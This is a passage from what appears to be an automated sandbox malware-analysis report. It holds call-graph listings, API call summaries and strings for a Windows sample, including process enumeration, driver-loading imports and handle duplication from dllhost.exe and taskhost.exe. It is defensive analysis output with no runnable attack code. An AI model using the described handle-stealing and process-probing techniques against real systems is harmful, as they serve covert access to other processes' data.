memcpy memset memcpy 40176->40199 40200 43a121 11 API calls 40176->40200 40178 43a325 40178->40167 40178->40171 40178->40175 40179 4169a7 11 API calls 40178->40179 40180 42b5b5 memset memcpy 40178->40180 40181 42bf4c 14 API calls 40178->40181 40182 42b63e 14 API calls 40178->40182 40184 4165ff 11 API calls 40178->40184 40202 42bfcf memcpy 40178->40202 40179->40178 40180->40178 40181->40178 40182->40178 40184->40178 40185->40157 40205 43817e 40186->40205 40188 42ff99 40189 42ffe3 40188->40189 40190 42ffd0 40188->40190 40193 42ff9d 40188->40193 40210 4169a7 11 API calls 40189->40210 40209 4169a7 11 API calls 40190->40209 40193->40176 40359 4165a0 40194->40359 40197->40176 40198->40176 40199->40176 40200->40176 40201->40178 40202->40178 40203->40167 40204->40175 40206 438187 40205->40206 40208 438192 40205->40208 40211 4380f6 40206->40211 40208->40188 40209->40193 40210->40193 40213 43811f 40211->40213 40212 438164 40212->40208 40213->40212 40216 437e5e 40213->40216 40239 4300e8 memset memset memcpy 40213->40239 40240 437d3c 40216->40240 40218 437eb3 40218->40213 40219 437ea9 40219->40218 40224 437f22 40219->40224 40255 41f432 40219->40255 40222 437f06 40302 415c56 11 API calls 40222->40302 40226 437f7f 40224->40226 40227 432d4e 3 API calls 40224->40227 40225 437f95 40303 415c56 11 API calls 40225->40303 40226->40225 40228 43802b 40226->40228 40227->40226 40230 4165ff 11 API calls 40228->40230 40231 438054 40230->40231 40266 437371 40231->40266 40234 43806b 40235 438094 40234->40235 40304 42f50e 138 API calls 40234->40304 40238 437fa3 40235->40238 40305 4300e8 memset memset memcpy 40235->40305 40238->40218 40306 41f638 104 API calls 40238->40306 40239->40213 40241 437d69 40240->40241 40244 437d80 40240->40244 40307 437ccb 11 API calls 40241->40307 40243 437d76 40243->40219 40244->40243 40245 437da3 40244->40245 40247 437d90 40244->40247 40248 438460 134 API calls 40245->40248 40247->40243 40311 437ccb 11 API calls 40247->40311 40251 437dcb 40248->40251 40249 437de8 40310 424f26 123 API calls 40249->40310 40251->40249 40308 444283 13 API calls 40251->40308 40253 437dfc 40309 437ccb 11 API calls 40253->40309 40256 41f54d 40255->40256 40262 41f44f 40255->40262 40257 41f466 40256->40257 40341 41c635 memset memset 40256->40341 40257->40222 40257->40224 40262->40257 40264 41f50b 40262->40264 40312 41f1a5 40262->40312 40337 41c06f memcmp 40262->40337 40338 41f3b1 90 API calls 40262->40338 40339 41f398 86 API calls 40262->40339 40264->40256 40264->40257 40340 41c295 86 API calls 40264->40340 40342 41703f 40266->40342 40268 437399 40269 43739d 40268->40269 40271 4373ac 40268->40271 40349 4446ea 11 API calls 40269->40349 40272 416935 16 API calls 40271->40272 40273 4373ca 40272->40273 40274 438460 134 API calls 40273->40274 40279 4251c4 137 API calls 40273->40279 40283 415a91 memset 40273->40283 40286 43758f 40273->40286 40298 437584 40273->40298 40301 437d3c 135 API calls 40273->40301 40350 425433 13 API calls 40273->40350 40351 425413 17 API calls 40273->40351 40352 42533e 16 API calls 40273->40352 40353 42538f 16 API calls 40273->40353 40354 42453e 123 API calls 40273->40354 40274->40273 40275 4375bc 40277 415c7d 16 API calls 40275->40277 40278 4375d2 40277->40278 40280 4442e6 11 API calls 40278->40280 40300 4373a7 40278->40300 40279->40273 40281 4375e2 40280->40281 40281->40300 40357 444283 13 API calls 40281->40357 40283->40273 40355 42453e 123 API calls 40286->40355 40289 4375f4 40292 437620 40289->40292 40293 43760b 40289->40293 40291 43759f 40294 416935 16 API calls 40291->40294 40296 416935 16 API calls 40292->40296 40358 444283 13 API calls 40293->40358 40294->40298 40296->40300 40298->40275 40356 42453e 123 API calls 40298->40356 40299 437612 memcpy 40299->40300 40300->40234 40301->40273 40302->40218 40303->40238 40304->40235 40305->40238 40306->40218 40307->40243 40308->40253 40309->40249 40310->40243 40311->40243 40313 41bc3b 101 API calls 40312->40313 40314 41f1b4 40313->40314 40315 41edad 86 API calls 40314->40315 40322 41f282 40314->40322 40316 41f1cb 40315->40316 40317 41f1f5 memcmp 40316->40317 40318 41f20e 40316->40318 40316->40322 40317->40318 40319 41f21b memcmp 40318->40319 40318->40322 40320 41f326 40319->40320 40323 41f23d 40319->40323 40321 41ee6b 86 API calls 40320->40321 40320->40322 40321->40322 40322->40262 40323->40320 40324 41f28e memcmp 40323->40324 40326 41c8df 56 API calls 40323->40326 40324->40320 40325 41f2a9 40324->40325 40325->40320 40328 41f308 40325->40328 40329 41f2d8 40325->40329 40327 41f269 40326->40327 40327->40320 40330 41f287 40327->40330 40331 41f27a 40327->40331 40328->40320 40335 4446ce 11 API calls 40328->40335 40332 41ee6b 86 API calls 40329->40332 40330->40324 40333 41ee6b 86 API calls 40331->40333 40334 41f2e0 40332->40334 40333->40322 40336 41b1ca memset 40334->40336 40335->40320 40336->40322 40337->40262 40338->40262 40339->40262 40340->40256 40341->40257 40343 417044 40342->40343 40344 41705c 40342->40344 40346 416760 11 API calls 40343->40346 40348 417055 40343->40348 40345 417075 40344->40345 40347 41707a 11 API calls 40344->40347 40345->40268 40346->40348 40347->40343 40348->40268 40349->40300 40350->40273 40351->40273 40352->40273 40353->40273 40354->40273 40355->40291 40356->40275 40357->40289 40358->40299 40364 415cfe 40359->40364 40368 415d23 __aullrem __aulldvrm 40364->40368 40371 41628e 40364->40371 40365 4163ca 40378 416422 11 API calls 40365->40378 40367 416172 memset 40367->40368 40368->40365 40368->40367 40369 416422 10 API calls 40368->40369 40370 415cb9 10 API calls 40368->40370 40368->40371 40369->40368 40370->40368 40372 416520 40371->40372 40373 416527 40372->40373 40377 416574 40372->40377 40375 416544 40373->40375 40373->40377 40379 4156aa 11 API calls 40373->40379 40376 416561 memcpy 40375->40376 40375->40377 40376->40377 40377->40176 40378->40371 40379->40375 40401 441939 40426 441247 40401->40426 40404 4418ea 40405 441897 40407 442bd4 40405->40407 40408 4418e2 40405->40408 40407->40404 40430 441409 memset 40407->40430 40408->40404 40429 4414a9 12 API calls 40408->40429 40411 4308a4 40412 4308e4 40411->40412 40413 4308bc 40411->40413 40438 42b896 memset 40412->40438 40431 42c0c8 147 API calls 40413->40431 40416 430931 40416->40405 40417 4308d3 40418 4308e8 40417->40418 40419 4308d8 40417->40419 40432 42b896 memset 40418->40432 40436 4169a7 11 API calls 40419->40436 40422 4308f3 40433 42bbbe 40422->40433 40424 4308ff 40437 415c23 memcpy 40424->40437 40427 42b63e 14 API calls 40426->40427 40428 441259 40427->40428 40428->40404 40428->40405 40428->40411 40429->40404 40430->40407 40431->40417 40432->40422 40439 42b9bd 40433->40439 40436->40412 40437->40412 40438->40416 40440 42b9d2 40439->40440 40454 42bb72 40439->40454 40441 42ba5a memcpy 40440->40441 40442 42ba69 memcpy memset 40440->40442 40440->40454 40443 42bab6 40441->40443 40442->40443 40445 42bad5 memcpy 40443->40445 40446 42baef 40443->40446 40445->40446 40447 42bb15 40446->40447 40449 42bb1a 40446->40449 40450 42bb0a 40446->40450 40448 42bb86 40447->40448 40455 42bb37 40447->40455 40453 42b9bd memcpy 40448->40453 40448->40454 40462 42bbd5 memcpy memcpy memcpy memset memcpy 40449->40462 40461 42be4c memcpy memcpy memcpy memset memcpy 40450->40461 40456 42bba0 40453->40456 40454->40424 40455->40454 40457 42b9bd memcpy 40455->40457 40458 42b9bd memcpy 40456->40458 40459 42bb5e 40457->40459 40458->40454 40460 42b9bd memcpy 40459->40460 40460->40454 40461->40447 40462->40447 40463 41493c EnumResourceNamesW 37673 4287c1 37674 4287d2 37673->37674 37675 429ac1 37673->37675 37676 428818 37674->37676 37677 42881f 37674->37677 37683 425711 37674->37683 37688 425ad6 37675->37688 37743 415c56 11 API calls 37675->37743 37710 42013a 37676->37710 37738 420244 97 API calls 37677->37738 37682 4260dd 37737 424251 120 API calls 37682->37737 37683->37675 37685 4259da 37683->37685 37691 422aeb memset memcpy memcpy 37683->37691 37692 429a4d 37683->37692 37695 4260a1 37683->37695 37706 4259c2 37683->37706 37709 425a38 37683->37709 37726 4227f0 memset memcpy 37683->37726 37727 422b84 15 API calls 37683->37727 37728 422b5d memset memcpy memcpy 37683->37728 37729 422640 13 API calls 37683->37729 37731 4241fc 11 API calls 37683->37731 37732 42413a 90 API calls 37683->37732 37736 416760 11 API calls 37685->37736 37691->37683 37693 429a66 37692->37693 37697 429a9b 37692->37697 37739 415c56 11 API calls 37693->37739 37735 415c56 11 API calls 37695->37735 37698 429a96 37697->37698 37741 416760 11 API calls 37697->37741 37742 424251 120 API calls 37698->37742 37701 429a7a 37740 416760 11 API calls 37701->37740 37706->37688 37730 415c56 11 API calls 37706->37730 37709->37706 37733 422640 13 API calls 37709->37733 37734 4226e0 12 API calls 37709->37734 37711 42014c 37710->37711 37714 420151 37710->37714 37753 41e466 97 API calls 37711->37753 37713 420162 37713->37683 37714->37713 37715 4201b3 37714->37715 37716 420229 37714->37716 37717 4201b8 37715->37717 37718 4201dc 37715->37718 37716->37713 37719 41fd5e 86 API calls 37716->37719 37744 41fbdb 37717->37744 37718->37713 37722 4201ff 37718->37722 37750 41fc4c 37718->37750 37719->37713 37722->37713 37725 42013a 97 API calls 37722->37725 37725->37713 37726->37683 37727->37683 37728->37683 37729->37683 37730->37685 37731->37683 37732->37683 37733->37709 37734->37709 37735->37685 37736->37682 37737->37688 37738->37683 37739->37701 37740->37698 37741->37698 37742->37675 37743->37685 37745 41fbf1 37744->37745 37746 41fbf8 37744->37746 37749 41fc39 37745->37749 37768 4446ce 11 API calls 37745->37768 37758 41ee26 37746->37758 37749->37713 37754 41fd5e 37749->37754 37751 41ee6b 86 API calls 37750->37751 37752 41fc5d 37751->37752 37752->37718 37753->37714 37756 41fd65 37754->37756 37755 41fdab 37755->37713 37756->37755 37757 41fbdb 86 API calls 37756->37757 37757->37756 37759 41ee41 37758->37759 37760 41ee32 37758->37760 37769 41edad 37759->37769 37772 4446ce 11 API calls 37760->37772 37763 41ee3c 37763->37745 37766 41ee58 37766->37763 37774 41ee6b 37766->37774 37768->37749 37778 41be52 37769->37778 37772->37763 37773 41eb85 11 API calls 37773->37766 37775 41ee70 37774->37775 37776 41ee78 37774->37776 37831 41bf99 86 API calls 37775->37831 37776->37763 37779 41be6f 37778->37779 37780 41be5f 37778->37780 37786 41be8c 37779->37786 37810 418c63 memset memset 37779->37810 37809 4446ce 11 API calls 37780->37809 37783 41be69 37783->37763 37783->37773 37784 41bee7 37784->37783 37814 41a453 86 API calls 37784->37814 37786->37783 37786->37784 37787 41bf3a 37786->37787 37790 41bed1 37786->37790 37813 4446ce 11 API calls 37787->37813 37789 41bef0 37789->37784 37792 41bf01 37789->37792 37790->37789 37793 41bee2 37790->37793 37791 41bf24 memset 37791->37783 37792->37791 37794 41bf14 37792->37794 37811 418a6d memset memcpy memset 37792->37811 37799 41ac13 37793->37799 37812 41a223 memset memcpy memset 37794->37812 37798 41bf20 37798->37791 37800 41ac52 37799->37800 37801 41ac3f memset 37799->37801 37804 41ac6a 37800->37804 37815 41dc14 19 API calls 37800->37815 37802 41acd9 37801->37802 37802->37784 37806 41aca1 37804->37806 37816 41519d 37804->37816 37806->37802 37807 41acc0 memset 37806->37807 37808 41accd memcpy 37806->37808 37807->37802 37808->37802 37809->37783 37810->37786 37811->37794 37812->37798 37813->37784 37815->37804 37819 4175ed 37816->37819 37827 417570 SetFilePointer 37819->37827 37822 41760a ReadFile 37823 417637 37822->37823 37824 417627 GetLastError 37822->37824 37825 4151b3 37823->37825 37826 41763e memset 37823->37826 37824->37825 37825->37806 37826->37825 37828 4175b2 37827->37828 37829 41759c GetLastError 37827->37829 37828->37822 37828->37825 37829->37828 37830 4175a8 GetLastError 37829->37830 37830->37828 37831->37776 37832 417bc5 37834 417c61 37832->37834 37838 417bda 37832->37838 37833 417bf6 UnmapViewOfFile CloseHandle 37833->37833 37833->37838 37836 417c2c 37836->37838 37844 41851e 20 API calls 37836->37844 37838->37833 37838->37834 37838->37836 37839 4175b7 37838->37839 37840 4175d6 FindCloseChangeNotification 37839->37840 37841 4175c8 37840->37841 37842 4175df 37840->37842 37841->37842 37843 4175ce Sleep 37841->37843 37842->37838 37843->37840 37844->37836 39865 4147f3 39868 414561 39865->39868 39867 414813 39869 41456d 39868->39869 39870 41457f GetPrivateProfileIntW 39868->39870 39873 4143f1 memset _itow WritePrivateProfileStringW 39869->39873 39870->39867 39872 41457a 39872->39867 39873->39872

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                  • API String ID: 594330280-3398334509
                                                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 658 413e6a-413e76 654->658 655->654 660 413e46-413e5c GetProcAddress 655->660 656->657 657->638 658->650 660->654 662->641
                                                                                  APIs
                                                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                  • API String ID: 912665193-1740548384
                                                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                  • memcpy.MSVCRT ref: 0040B60D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                  • String ID: BIN
                                                                                  • API String ID: 1668488027-1015027815
                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                    • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                  • String ID:
                                                                                  • API String ID: 2947809556-0
                                                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$FirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 1690352074-0
                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystemmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3558857096-0
                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 